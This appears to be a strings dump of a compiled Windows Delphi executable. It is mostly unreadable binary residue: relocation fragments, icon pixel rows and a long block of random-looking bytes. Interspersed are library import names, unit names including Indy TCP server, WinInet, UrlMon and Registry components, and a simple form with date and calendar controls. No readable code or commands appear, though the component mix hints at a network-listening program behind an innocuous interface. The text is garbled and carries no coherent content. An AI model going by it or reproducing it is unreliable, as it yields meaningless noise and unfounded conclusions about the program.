ImageList_DragShowNolock
ImageList_SetDragCursorImage
ImageList_DragMove
ImageList_DragLeave
ImageList_DragEnter
ImageList_EndDrag
ImageList_BeginDrag
ImageList_Remove
ImageList_DrawEx
ImageList_Draw
ImageList_GetBkColor
ImageList_SetBkColor
ImageList_ReplaceIcon
ImageList_Add
ImageList_GetImageCount
ImageList_Destroy
ImageList_Create
InitCommonControls
comdlg32.dll
GetOpenFileNameA
0(0<0T0l0
1,1}1
2&2.262>2F2N2V2^2f2n2v2~2
3&3.3Z3b3j3r3z3
3,434{5
:+:6:A:I:S:]:g:}:
;";/;5;O;V;`;j;t;
<.<F<N<
=1=[>h>
0#0(0.0
1C1O1W1
2(2/242:2M2V2t2z2
3&3F3^3
4 4(4
6-6K6W6_6
737L7e7
8,8n:v:
>+><>X>p>
1%1;1Y1o1
6.666L6d6r6
7C7p7y7
969?9q9x9
9+:7:
<$</<[<p<
= =$=)=0=6=>=I=
>$>.>S>]>g>o>u>
82:;:B;K;
0]2{2
495J5
:4;};
<!<;<D<M<Y<c<
=,=:=?=X=h=y=
=G>S>`>r>x>
>(?>?F?N?V?^?f?n?v?~?
0&0.060>0F0N0V0^0f0n0v0~0
1&1.161>1F1N1V1^1f1n1v1~1
2&2.262>2F2N2V2^2f2n2v2~2
3&3.363>3F3N3V3^3f3n3v3~3
4&4.464>4F4N4V4^4f4n4v4~4
5&5.565>5F5N5V5^5f5n5v5~5
6&6.666>6F6N6V6^6f6n6v6~6
7&7.767>7F7N7V7^7f7n7v7~7
; ;(;0;8;@;H;P;X;`;h;p;x;
< <(<0<8<@<H<P<X<`<h<p<x<
= =([email protected]=H=P=X=`=h=p=x=
> >0><>P>X>\>`>d>h>l>p>t>x>
? ?$?(?,?0?4?8?<?P?p?x?|?
0 0(0,0004080<[email protected]`0
2<2D2H2L2P2T2X2\2`2d2t2
3$3D3L3P3T3X3\3`3d3h3l3|3
4 444T4\4`4d4h4l4p4t4x4|4
5 5$5(5,5054585H5h5p5t5x5|5
6$6(6,6064686<[email protected]
8(858=8L8Y8a8|8
9 9$9(9,90949L9X9\9x9
:F:N:T:
>A?Q?\?i?n?x?
.0A0M0d0p0
0-151
2b6w6
8!8%8)8-81858
;F<u<
3k4)5;6
:@;{;
=L=P=T=X=\=`=d=h=l=p=t=x=|=
?$?8?i?
4K4=5
6N7o7
8B9X9e9j9|9
;C;p;
<*=f>~>
>#?U?
060J0{0
2&2?2Z2
717?7F7^7e7x7
8%8P8_8s8
<%</<5<<<F<K<Q<V<\<a<g<n<t<y<
=<=E=N=T=e=p=u=
>9>\>y>
0)1Y1m1
4?4m4
5)505B5G5W5a5
506F6o6}6
7"7A7O7n7
8"8E8g8v8
:M:f:
<>?W?
0(0L0P0T0X0\0`0d0h0l0p0t0x0|0
1 1$1(1,10181<1D1H1P1T1\1`1h1l1t1x1
2 2(2,[email protected]\2d2h2p2t2|2
3+363J3U3_3j3t3
4&404:4D4N4X4b4l4v4
5"5*525
686E6n6
7F7|7
8=8{8
9_9~9
:":-:3:8:C:I:N:Y:_:d:o:u:z:
;%;*;5;;;@;K;Q;V;a;g;l;w;};
=6=:=>=V=d=h=
>0>P>X>\>`>d>h>l>p>t>x>
? ?$?(?,?0?4?8?<[email protected]?\?|?
0$0D0L0P0T0X0\0`0d0h0l0
1 1$1(1,1014181X1x1
2$2D2L2P2T2X2\2`2d2h2l2
3)3[3
6"696H6_6n6
6 7/7F7
7`:{=
=(>`>
> ?X?o?
%0>0U0
1)1-1115191=1A1E1I1M1Q1U1Y1]1a1e1i1m1q1u1y1}1
5M6d6}6
7"797t7
768R8V8Z8^8b8f8j8n8r8v8z8~8
;!;%;);-;
1!141F1
2 2:2?2
5%5*5_5n5{5
6;6G6S6]6c6m6x6
7"7)7/767H7X7`7h7p7x7
8 8([email protected][8h8z8(9=9
< =$=(=,=0=4=v=
=.>O>S>W>[>_>c>
0#0*040?0Q0b0o0{0
1!1d1v1|1
3,3L3T3X3\3`3d3h3l3p3t3
4 4$444T4\4`4d4h4l4p4t4x4|4
5 5$5(5,505D5d5l5p5t5x5|5
6 6$6(6,6064686<6T6t6|6
8(8H8P8T8X8\8`8d8h8l8p8|8
9=9A9E9]9l9p9x9|9
: :5:X:d:h:x:
; ;.;@;N;R;d;};
< <$<(<,<0<4<8<<<@<D<H<L<P<T<X<\<`<d<h<x<
=0=8=<[email protected]=D=H=L=P=T=X=\=`=d=h=l=p=t=
>$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>x>
? ?$?(?,?0?4?8?<[email protected]?D?H?L?P?T?X?
&0*0.02060:0>0B0F0J0N0R0V0Z0r0
2 2$2(2,2024282F2X2x2
2F3J3N3R3V3Z3^3v3
4&4P4T4X4\4`4d4h4l4p4t4x4|4
5 5(5,5054585<[email protected]\5`5d5h5
6,6>6B6T6p6
7$7,7074787<[email protected]\7|7
:V:]:~:
<-=b=t=
10D0t0y0
1H1M1
2[2h2w2
3$313C3H3f3s3
4#5(5
6)626B6e6p6
93989
9L:o:
>'>j>
4Q4n4
7L7b7
708\8
;+<H<}<
>:>c>
?M?c?
3`4x4)5A5
71888
9^9e9
?6?=?
0,0;0R0
5!585H5U5e5
6>6[6`6z6
6$7)7P7X7g7
9)9x9E:T:
<q=x=
3X3y3
5!5F5
6p7w7
:!:8:c:
>A>`>
3F4K4e4
4%5V5]5
5D6s6"7d7
9 :N:
:Z;a;x;+<
<1=A=
>(>r>
0"090
202a2k2{2
3/3<3K3[3
464S4X4
::;A;Z>
4/5>5n5s5
6<6b6j6
6J7c7o7v7
8,888K8W8a8h8r8y8
9 9([email protected]`9h9p9x9
: :(:0:8:@:H:P:X:`:h:p:x:
;*;0;H;h;p;t;x;|;
<%<P<`<|<
<L=c=
? ?5?X?d?h?t?x?
02060:0S0W0[0r0v0z0
1 1$1(141>1B1S1W1[1s1{1
2 2$2([email protected]]2u2y2}2
3&3.3F3i3q3
4 4,484<4D4H4L4P4T4X4\4`4d4h4l4p4t4x4|4
5$5,5054585<[email protected]
6 6$6(6,6064686<[email protected]\6`6d6h6l6p6t6x6|6
7(7074787<[email protected]\7`7d7h7l7p7t7x7|7
8 8$8(8,8084888<8
;;;m;
<"<4<W<
3F4c4{4
465F5X5
5Q6b6
9F9c9{9
:*:<:
<'<?<P<b<
=.>3>
?&?^?
0.1X1e1
1l2y2
4 4/4
6>6^6x6
6"7z7
7?8q8
:J:z:
>0>S>k>
181!2
;:;l;~;
<&<`<p<
=J=e=
2!375l5z5
5G5T5
556C6
7K8f8
5f5v5
6F7b7
8>8M8R8j8o8z8
:E:U:T;r;
<%</<9<C<M<W<b<l<v<
=)=4=>=I=S=Z=d=k=u=|=
>$>(>,>0>4>8><>@>D>H>L>P>T>d>
0!1/191R1Z1b1j1r1z1
2/3;3H3Z3z3
4Q4Y4_4k4r4
5#5/5p5x5~5
6*6H6Z6
7*7u7}7
7I8Q8W8c8k8
9%9+979G9l9w9=:G:M:Q:W:[:a:e:k:o:u:y:
; ;3;X;i;
<D<V<|<
= =$=(=6=
>'>C>P>T>\>p>x>|>
?$?.?M?x?
0)080
1J1\1
2c2s2 3g3n3
4D4e4n4
7E7g7
8Q8p8
;+;8;J;W;c;j;|;
<"<'<2<7<B<G<U<^<c<h<v<
=$=)=.=<=E=J={>
[email protected]?D?H?L?P?T?X?\?`?d?h?
1!1(1/161=1D1K1R1Y1`1g1n1u1|1
2#202<2J2_2l2q2~2
3 3%32373D3I3V3[3h3m3z3
5*5/5<5A5N5S5`5e5r5w5
:':4:F:S:_:l:~:
;&;3;?;L;^;d;v;
<#<0<B<H<X<d<h<p<t<x<|<
=+=K=q=
=H?[?`?|?
0(0,080<0D0H0L0P0T0X0\0`0d0h0l0p0t0x0|0
1!111V1Z1y1
2+2K2p2
2$323A3O3_3
4"4Q4
6-6I6
:W;_;
;m<y<
=3>s>
1!1(1H1]1
2 2(2,[email protected]_2k2t2}2
3 3$3(3,3034383<[email protected]\3`3d3h3l3t3
5P5_5v5
6$6,646<6D6L6T6\6d6l6t6|6
7$7,747<7D7L7X7\7`7d7h7l7p7t7x7|7
8 8$8(8,8084888<[email protected]\8`8d8h8l8p8t8x8|8
9"9,979<9H9P9X9`9h9p9x9
:):0:c:o:|:
; ;$;3;?;S;f;n;x;
<&<K<W<^<i<{<
=$=,=?=R=_=k=x=
>5>T>q>
?I?M?T?
0,080<0D0H0L0P0T0X0\0`0d0h0l0p0t0x0|0
2 2$2(2,2024282<[email protected]\2`2d2h2l2p2t2x2|2
3"3>3F3b3n3
4)414O4W4x4
5'5/5K5S5W5m5u5
6#6E6f6
7/747P7
8 8$8(8,8084888<[email protected]\8`8d8h8l8p8t8x8|8
9,9<9D9H9L9P9T9X9\9`9d9h9l9p9t9x9|9
: :$:(:,:8:E:I:Z:b:f:|:
;);-;1;J;R;p;x;
<-<1<5<P<X<r<z<~<
=#=I=o=
> >$>(>,>0>4>8><>@>D>H>L>`>u>y>
?$?,?M?U?|?
0Y0]0a0h0x0
1 1$1(1,1014181<[email protected]\1`1d1h1l1p1t1x1|1
[email protected]\2`2d2h2l2p2t2x2|2
3 3$3(3,3034383<[email protected]\3f3j3
5.5Q5]5s5{5
5!6)6-6C6K6l6t6x6
7)71757L7T7p7x7
8'838I8r8
9)9K9l9
:&:L:l:t:x:|:
: ;<;X;v;
< <,<0<8<<<@<D<H<L<P<T<X<\<`<d<h<l<p<t<x<|<
= =$=(=,=0=4=8=<=J=\=`=d=h=|=
>7>?>[>c>
?3?;?T?X?\?s?{?
0$0I0l0
131;1?1U1]1a1w1
292A2]2e2i2
3-3P3y3
414U4w4
5)5O5
<1<J<_<
586?6|6
7Z8l8
:$:2:N:j:
;+<8<
>->?>~>
0-141
335w5
<O=[=c=k=w=
3"3&3*3.32363:3>3B3F3J3N3R3V3Z3^3b3f3j3n3r3v3z3~3
3e6D7
8,84888<[email protected]\8`8d8h8l8p8t8x8|8
8C9O9\9n9t9
: :$:(:,:0:4:8:<:@:D:H:L:d:
;4;n;y;
<;<G<`<
>)?V?^?|?
1)1=1n1
405h5
6)6?6K6U6_6d6s6
7(7074787<[email protected]\7`7d7h7l7p7t7
8 8<8X8\8p8
9$9(9,9094989<[email protected]\9`9d9h9l9p9
:$:9:=:P:p:x:|:
; ;$;(;,;0;4;8;<;@;D;H;L;`;t;x;
< <$<(<,<0<4<8<<<@<D<H<L<P<h<
<0=H=d=|=
> >0>@>H>L>P>T>X>\>`>d>h>l>p>t>x>|>
?*?2?P?
0!0%0,0k0o0s0x0
0#1'1+1/13171<1
3#3'3+3/33383
3f4j4v4|4
4f5j5n5r5v5|5
6h6l6t6x6
7 7$7(7,7074787<[email protected]\7`7d7h7l7p7t7x7|7
7^8b8f8j8n8r8v8z8~8
9"9&9*9.92969:9>9B9F9J9N9R9V9Z9^9b9f9j9n9r9v9z9~9
:5:=:V:b:u:
; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X;\;`;d;h;l;p;t;x;|;
;T<d<
=$===h=
> >$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>d>h>l>p>t>x>|>
0"0&0*0.02060:0>0B0F0J0N0R0V0Z0^0b0f0j0n0r0v0z0~0
1"1&1*1.12161:1>1B1F1J1N1R1V1Z1l1}1
2 2$2(2,2024282<[email protected]\2`2d2h2l2p2t2x2|2
3 3$3(3,3034383<[email protected]\3`3d3h3l3p3t3x3|3
4&4*4.424D4U4Y4l4
4`5d5h5l5p5t5x5|5
6 6$6(6,6<6\6d6h6l6p6t6x6|6
7(7.7f7
:T:]:g:w:
=!>:>\>
3I3O3]3n3
4!444>4T4
5U5_5i5r5
5!636<6
7_7i7
8)8.888G8U8a8g8y8
9-979O9`9l9y9
:(:1:Q:[:e:
:b;r;
<5<X<f<
>6>B>T>_>d>l>w>
?(?K?}?
0 03080D0J0R0c0n0y0
3-3S3X3
6(6H6
6!7F7|7
:O;f<
193]3l3
4X4a4l4
6q7x7
;)<:>
?8?P?W?n?w?
6h7v708u8d9r9
=V=k=}=
>F?V?
3M4y4
6l7|7
7P8~8
:&;n;)<
>S?o?
0L0^0
2*3e3n3|3
9K;S;f;5<
8'8^8
1i2}2
;0>P?u?
2.3K3
666M6R6
6!8-8B8Q8k8
<0=x=i?p?
t273I3{3
2H5Z5k5
8&9V9
:4:D:
;(;]<
3t4-52576{6
627O728Q8]8e8q8|8
9#9(9-989=9B9M9R9W9b9g9l9w9
;);4;?;P;a;w;
<;<[<h<r<
=$=/=:=A=O=T=Y=c=s=~=
>(>2><>N>c>o>
? ?$?(?,?0?4?8?<[email protected]?D?H?L?P?T?X?\?`?d?h?l?p?t?x?|?
0 0,00080<[email protected]\0`0d0h0l0p0t0x0|0
1 1$1(1,1014181<[email protected]\1`1d1h1l1p1t1x1|1
2$2(2024282<[email protected]\2`2d2h2l2p2t2x2|2
30383<[email protected]\3`3d3h3l3p3t3x3|3
3g405j5
6.6B6
8L9`9t9
0+171D1V1_1d1o1t1
2$2(2,2024282<[email protected]\2`2d2h2l2p2t2x2|2
4P4l4
4)5i6
7+7;7
8#8^8V9
;_;l;|;
<0L0c0s0
2%2P2
4:4J4w4
4S5c5
7G7N7e738?8L8^8d8
8H9L9P9T9
9(:,:4:8:
;8;@;D;H;L;P;T;X;\;`;d;h;l;p;t;x;|;
< <$<(<,<0<4<8<<<@<D<H<L<P<T<X<\<`<d<h<l<p<t<x<|<
=:=B=`=h=
>9>A>[>c>g>}>
?0?8?<?S?[?_?u?
0 0$00040<[email protected]\0`0d0h0l0p0t0x0|0
1(1014181<[email protected]\1`1d1h1l1p1t1x1|1
232;2?2V2^2w2
3(3C3h3
4 4$4(4,4044484<[email protected]\4`4d4h4l4p4t4x4
4 5D5L5P5g5k5o5
6#6I6l6
7$7(7,7074787<[email protected]
909C9^9y9
:*:O:
; ;9;R;
;b=|=
>G>w>
'1;1n1
3!3-393G3S3b3n3z3
535a5
627X7
7A8N8
:R=e=;>
4^6q6G739\:
<m<w<
2-3?3
3;5a5
<1<q<
6J7Y8
8?9L9u9
3:4O4
5+5E5
7?7k7
8L9y9
9D:Z:n:
= =$=(=,=0=4=8=<[email protected]=D=H=L=P=T=X=\=`=d=h=l=p=t=x=|=
>">,>6>A>F>Q>V>`>l>v>}>
? ?(?,?0?4?8?<[email protected]?D?H?L?P?T?l?
0'0E0M0h0p0t0
1/171T1o1
2 2$2(2,2024282<[email protected]\2`2d2h2l2p2t2x2|2
3$3,3L3T3t3
606K6x6
787<7
8 8$8(8,8084888<[email protected]\8`8d8h8l8p8t8x8|8
8v9z9~9
:":&:*:.:2:6:::>:B:F:J:N:R:V:Z:^:b:f:x:
; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X;\;`;d;h;l;p;t;x;|;
<"<*<.<J<R<j<r<
=#=/=F=N=R=l=t=x=
>'>/>3>G>O>r>z>
?:?B?]?
0-05090N0q0y0}0
0%1-111N1w1{1
2,2Q2Y2]2t2
3)31353N3Z3s3
424[4g4~4
585D5]5i5
7=7f7r7
8<8L8X8\8d8h8l8p8t8x8|8
9 9$9(9,9094989<[email protected]\9`9d9h9l9p9t9x9
:4:<:@:D:H:L:P:T:X:\:l:x:|:
;$;;;D;P;T;d;l;p;t;x;|;
<-<5<
>7>@>H>Q>a>h>o>v>
?%?I?_?
1:1I1`1
:?:E:
;?;p;
< =.=D=
=S>c>??
0#3h3
4Z5e5t5
6-6c6h6
7I7]7q7
728t8
;P;v;
;%<u<
=)>^>i>v>|>
0m2$3T3
5\6l6
7f7s7
8(8H8
>&>\>r>
>\?f?
N1]1t1
5#5A5]5
6K6]6{6
859O9y9
?(?7?B?Y?|?
2.2B2
8&949F9Z:f:>;
1X1t1
252u2
343M3
3(4C4h4
6)6k6{6
6A7K7
:,:6:N:d:
;0;5;F;T;f;};
7*797H7u7
:+:>:L:
<'<H<
4L5W5b5|5
6#6:6I6Y6f6l6
8g8y8~8
;-;<;M;`;y;
<<<[<
=0=Y=E>
?$?C?
5T5|6
6j8}8
>*???b?
2(3c3
6%7-7;7[7x7
7%8P:v:
:D;g;
0V1f1q1
2.2>2F2U2_2d2
3 [email protected]`3h3l3p3t3x3|3
4 4([email protected]`4h4p4x4
5 5([email protected]`5h5p5x5
6 6$6(6,6064686<[email protected]
525X5k5
6*6F6U6Z6e6t6
8 8$8(8,8084888<[email protected]\8`8d8h8l8p8t8x8|8
9?:^:u:
; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X;\;`;d;h;l;p;t;x;|;
<"<3<D<U<f<w<
=!=2=C=T=e=v=
>->;>I>Z>
?#?G?S?`?r?x?
0 0$0(0,0004080<[email protected]\0`0d0h0l0p0t0x0|0
1*1<1L1Z1
2:2~2
2=3Q3f3
3/4D4
555N5
6$7r7
818F8V8b8
9,9L9
9I:_:~:
<?<U<t<
< =;=p=
>)>Z>q>
#0/070?0P0b0j0p0w0
2:3k3x3
4S4q4
5*545?5I5T5^5h5n5x5~5
6#6*6/666A6N6S6_6j6w6|6
7 7$7(7,7074787<[email protected]\7`7x7
878c8o8|8
9+929=9O9b9j9v9
:*:7:C:P:b:o:{:
;#;0;B;O;[;h;z;
<"</<;<H<Z<g<s<
=(=0=4=8=<[email protected]=D=H=L=P=T=X=\=`=d=h=l=p=t=x=|=
>0>P>X>\>`>d>h>l>p>t>x>
0 0$0(0,0004080<[email protected]
051e1
4 4$4(4,4044484<[email protected]\4`4d4h4l4p4t4x4|4
7$7=7I7W7l7
9 9$9(9,9094989<[email protected]\9`9d9h9l9p9t9x9|9
: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X;\;`;h;s;};
2X2`2h2p2x2
[email protected]\3`3d3h3l3p3t3x3|3
404h4p4x4
5 5([email protected]`5h5p5x5
6 6([email protected]`6h6p6x6
9$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
;$;,;4;<;D;L;
> >$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>d>h>l>p>t>x>|>
? ?$?(?,?0?4?8?<[email protected]?D?H?L?P?T?X?\?`?d?h?l?p?t?x?|?
0 0$0(0,0004080<[email protected]\0`0d0h0l0p0t0x0|0
1 1$1(1,1014181<[email protected]\1`1d1h1l1p1t1x1|1
2 2$2(2,2024282<[email protected]\2`2d2h2l2p2t2x2|2
3 3$3(3,[email protected]\3`3d3h3l3p3t3x3|3
p3t3x3|3
4 4$4(4,4044484<[email protected]\4`4d4h4l4p4t4x4|4
5 5$5(5,5054585<[email protected]\5`5d5h5l5p5t5x5|5
6 6$6(6,6064686<[email protected]\6`6d6h6l6p6t6x6|6
7 7$7(7,7074787<[email protected]\7`7d7h7l7p7t7x7|7
8 8$8(8,8084888<[email protected]\8`8d8h8l8p8t8x8|8
333333333333333333
33333333?333333
33?33
33338
33333
33833
333338
33333833
33333
333838
3333339
3333333333333338
333333333333333333
334C33333338
33333
33B$3333333
34""C33333833
3B""$33333
4"*""C3338
"C3338
:*"*"$3338
"C338
"*"$33
"*:"$
"J"$3
:33:"$
"C8338
"J"C3333
3333:"$
#33338
33333
"J333333
33333:"$3333338
333333
$3333333
333333:"33333338
3333333
33333333
333333333333333333
33333333?333333
33?33
33338
33333
33833
333338
33333833
33333
333838
3333339
3333333333333338
333333333333333333
33DDDDD3333
33333333333
333333?
333333
333333
3333f3333333?
3336Dc3333338
333>fC333333
c333333
3333333333338
3333Dc3333333
3336fC3333338
333>fC333333
333>fd333333
fC33333
3333>fd333338
334C3
fC333?3
33fd3>fC333
fDFfC338
33>ffffc338
fff3333
33833
33338
3333333333338
4DF334DC33
333*C33
c33*C333
338?3
33338?383
F*F333383
"$c33333
"dc3333833
CjC338
CjC338
D*C33383
33333
3332*
C33333833?33
3333"
3333333
3334JC33333338?333
C3333333
C3333333
3333fc33333338
333333333333?
33333?
333333
333333333333333333
333333333333333333
333333333333
33333
334C33333338
33333
33B$3333333
34""C33333833
3B""$33333
4"*""C3338
"C3338
:*3:"$3338
"C333
3333:"$3333338
33333
"C333333
33333:"$3333338
333333
"C333333
333333:"C3333338
3333333
#3333333
3333333:3333333383
333333333333333333
333DDD33333?
2C4"""D338
2$B""""C38
2""333:"C8
83338
2""#33:DC8
333338
33333
333333333333333
333333DDD3
:DC33:""$8
:"C333
$334B"$3
"DDB""$3
3:"""""
333333
333333333333333333
333333333333333333
333333333333
33333
334C33333338
33333
33B$3333333
34""C33333833
3B""$33333
4"*""C3338
"C3338
:*3:"$3338
"C333
3333:"$3333338
33333
"C333333
33333:"$3333338
333333
"C333333
333333:"C3333338
3333333
#3333333
3333333:3333333383
333333333333333333
33333333
ww"""'wp
ww"*"'wp
R=\{U
?z*z^J
Lv~HTPz
eCSj8n
Wh\gp
V-Scz
ZWm9O,
~;7\Q
q PA4R
~=a(}
ym">)Lsd
'Bt~A
mqn%!
tn/PA
MeB_&
,o'Kj
y/vpX>
T_Oou
m!.N]
<7APAc
1xwmX4
}A]>lMk
ytkW\
Z C#M
#0"<[}
I"[}Am
{dL u1
dPAEb
gW$UT$e
Yho,Aa
5C\9^
^Y`>y
}MFjM|M
x>;Ib
H6lmY
r2H2M
At-PY
"s=-D-b/v-
^10~#`
'6`rL
BL537
ay)wA
U32Pj
UPA ~R
%)pAhz
(go_d`
vg<.h
iEN$5
tpPuB
M`Rb~
ho=Noc
a|bxc
l1kEK
-QYqV
98f(|
AK+bcy
Zkp>b`4
?om4/M'o
[SV$PYPD
y:ex&H
a$j!|
|4-o81
zu_u%L+
,&PAx
Ky;VG
Xg-zo
h0[Vo8
egs ~z
+JyD5
tvW<;
}h^Vf
I:WzPD
L\IehLK
N%u|[
^xvU93Z
;1&TR
..L/W
>$"/.
9QfHf
wwPdh
t' (g
q8s:h
OzYnU
'Q?pjB
W*_PAq
l3HRQ$
8yZd&
,!wmg
^3_G~=
wp5aG0
tzPAy
$4hf<
vSC{^
iy/,|(
a;Ti2k
hQW.!
Bqi2[(
=^kev
jWL2Z`
dG#XG
PAR7N
p,o>j
.+8n+T
FbdBM
M!f/(
a 2BT
E~;]F
*{UOB
:2w[N
mr5Bfc
)9!h_)
4<ajdL
xPA2x
MRY)T
8/_d(%c
=gKzE
/Lo#nl
"CC9-
E (az
*2UDg
gPJSb
vL2Sw
t]t?Cne
kQEPC]
ArCdv
PAZcm
AD8gv
>zz.#.X
i>1oSi
g~ms0~/4
GWg"|
8V4bW
8T(VVw
=iPAU0
:I+9x
c'XtD
*L^gujg)
u5G.z
FZdE8L
S,AV $
BPA!`
@^EP{|
zJ!o^N
el'!S
1TIJL3a+
LGL4K
X)H=K
sRVoe
[WxBSS
!K}Sg
V?RY)
E073{
T9<SH<
9B2]e*
`;3M8q
gF,"X
5^!(CXN
lr{9^2{
AacXX!I
*:b}=
uJ3cb.~
4#`7#
m;|*HC
"cI*/
O[=tf
H[i*e
K_H.t
H_[Ld
6IO9Z
Z2zQg_Uo
V[bZ^
~6.z5
"<2\m0
q"dSN
HP|9-n
vzPyz
m`::n#
Kr]lk
_GLS>
@>q_UrH
}p)d\U
4[kDlF
nYDON
K=oez
Kxo/AA;
"mt*}
]6vYl
(I4#5
;FGK~.
oY4Qm
q-K|=o
JHgA&
~g/F*
I5zqgQ
q6g5:'.
\z|y'Q/
zJER2
Zi-h
,a+]Y
ZJ(4<_
WQ5A|z
PAovk
27OsD
kWOyh
?n1xM
,)~9D
E2ZLiN2
naQ&bL
a'%b$
T"6k*
'QWZhU
S>}Mw
i\h*A
tc'%m
lV^(E
V )Fa
f%8L`
-~KKW
Y"LaA
`b(UJ
:r2wh
)cgM,
?s$>S.M
7!-<2
!vb?f
hC.J(
Kk!YB
~)@0^
AEBd)<
1R1vl
g<G6L
C)*<},
)VZt|
M2UQX
2"j!.
=~I\_
&xh$=M
@%smG
)(zzz
D_|Er
-Oa^$=
,iY3gd
MiC[,ZK
#1sE$j
lspSVo%9
luUhfGY
3.b)F
Ruy#{
btg,/*g
:6^>Uo
hrC(*/
yzvRk
c,gDK
9Rj/F;
(N:Z]
mrap/F
B#Qvns
<&;6]k
E>`3i
P*PAY8
,Np,T(
}Q*"V
lUjD
3 |#P
^$64D
\Y'N'G
@%zG[
:Y%|h
h~oCWY
gn9?86sxh
D~8m)Z
id6cPA
kHlsr"
NOd2[
A.PA~H
!)J%T
0p\=D
S~H;r%
dw-gJ
i)@x*T
f).PAd2j
`x4s4G<^
G*%9/
utYy~
0z9[u
0$}y^;aF
Ae%Kk%l
Q(~$k#
tn4fK4Wv
"kGcV
zZN8xRw
@KCHF
-J4jy
HV:~4
,Lr{v
Ya*n^:
PX]ow
6mr=m
/T^PC
.Wh(.
z<\:h{
]]f`?4
KDESE
/Rt5,
9mu`_
"FH1m
PA6 Wo
8)hG$
m/_=_s
s1Z.7
_04X2
8HoJ#
(j8l*xO
]lY)k
X_6:F
6qm1'
pR]kvFh
/d!B1
`s;3=
VkCsX]
(!n]wY
grIo$^,
'&m &
6_Y]u0
{1DH.lX
~0'`r
wjnUwI
6IyPADD
[PAb6
Ej24l9
xsCW*MU~1
#PAb=I
I]SS:@
m}s51
S?,PW
V>mX|R
">N5_
36l,m?
/01eS4P7
cbu(xDoC~
7"f3h+
`jyaR
A1yQg
)OS}~J
vE1zs
PAj[u~xDm
}RK^e
U2^6~ZK
Wa2rk
F06#s>
lL^]v%z
thCk
xfn%@e
>E%nP^
Si&&&
w8]-;
8H)$*
cZ?z"
S3nU'
8sPA`P)
;uejj
6``.JqrH
~i{w"
bN=qrSe
UN3uU
x4E(%
ob1cF
5"H-%
HT_1v6
SJPAD
WfrVc:3
s1/ob]!
9:_I<
ec1nf
pi$M:
}]RdH>
g-N'2}
>^rV<r
gr:Cr
c~Lr%
~uzpD`Q
6:m63
FL#7q#
"4=>\
qM/7v
DHm,H
K4;PA!!
3f+40
f2a7Y
4oa]d
-7Nam,![N
9<UaS
at9c2
9p+$$<
mSTi(I
e"\W#
A:*eC
IWnRF
f*%~Y
{zPART
('Fv
KQfhv
ZsqT<
CH[d)
Z&^yg
:l1=w
,n~)6
aFC["
oH}4\
>pE7w
\/CQ#}
k3?ln$C
-WYq'
]bF84
0-nQW
,Li#w
\P51 *
H#.Y,:
h%(YH
pw5F;N'B(
hH[st
<+k?G+#
&mlg=$'
*{)e(
6* PA
4w?wHs;o
S/Da8
yl->Il
C<S4LRT
.6V!4C<
ce#"A
,inOfi
)`\XH]T
{S/CZ
`PAr}?
n3ZKI
u.1D7
3Q&l!
DF36j
]=FLd
F)KQ9
%>H5q
m6$b1
P<'9R
W)4#
"a3h&
b.k/^&
1OB0h
[0bI/
KCRm{
D5PAE
Y3;Lu
_%6JG
PSN2-z
Bv2<p
s+2P\
SjI 3ia
/jD0X
iCzv~.
YBrp1
}:\-,
Fc$^T
hcqK/
OQ)u-v
{lg~+
~?is/v
Da|^9U
\C6*;
Gw^7Y
7Project1
YIdThreadMgrPool
uIdGlobal
IdStackWindows
IdException
System
SysInit
SysUtils
KWindows
UTypes
SysConst
|IdResourceStrings
^Classes
"RTLConsts
3Messages
CVariants
$VarUtils
QTypInfo
sActiveX
yIdStack
@IdStackConsts
)IdWinSock2
8Registry
IniFiles
EIdURI
SyncObjs
IdThread
%IdThreadMgr
+IdTCPServer
IdStrings
IdThreadSafe
IdComponent
IdAntiFreezeBase
IdBaseComponent
mIdSocketHandle
IdTCPConnection
IdStream
IdTCPStream
IdIntercept
BIdIOHandler
IdRFCReply
yIdIOHandlerSocket
jIdSocks
IdAssignedNumbers
IdThreadMgrDefault
IdServerIOHandler
&IdServerIOHandlerSocket
FlatSB
WinHelpViewer
RHelpIntfs
Contnrs
EActnList
Forms
Printers
Consts
WWinSpool
+Graphics
CommCtrl
StdActns
Clipbrd
YStrUtils
*ShellAPI
&Controls
5Themes
nComCtrls
ComStrs
ExtActns
0Mapi
dStdCtrls
vMenus
ImgList
Dialogs
ExtCtrls
IDlgs
3CommDlg
(ShlObj
RegStr
?WinInet
UrlMon
ExtDlgs
Buttons
CUxTheme
RichEdit
ToolWin
ListActns
MultiMon
Unit1
TForm1
Form1
Width
Height
Caption
4lEbTnyH6q9HTvFWfK32kWranFZ0iXk1tUfDDYMuJuCSx6N3uAXdN
Color
clBtnFace
Font.Charset
DEFAULT_CHARSET
Font.Color
clWindowText
Font.Height
Font.Name
MS Sans Serif
Font.Style
OldCreateOrder
PixelsPerInch
TextHeight
TDateTimePicker
DateTimePicker1
Width
Height
TabOrder
TMonthCalendar
MonthCalendar1
Width
Height
TabOrder
THotKey
HotKey1
Width
Height
HotKey
TabOrder
TUpDown
UpDown1
Width
Height
TabOrder
TIdThreadMgrPool
IdThreadMgrPool1
TOpenDialog
OpenDialog1
9>X'?
]xY*(
PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX
jjjjjj
ebutton
clock
combobox
explorerbar
header
listview
progress
rebar
scrollbar
startpanel
status
taskband
taskbar
toolbar
tooltip
trackbar
traynotify
treeview
window
jjjjj
jjjjj
jjjjj
jjjjj
jjjjj
jjjjj
jjjjj
jjjjj
jjjjj
jjjjj
jjjjj
BBABORT
BBALL
BBCANCEL
BBCLOSE
BBHELP
BBIGNORE
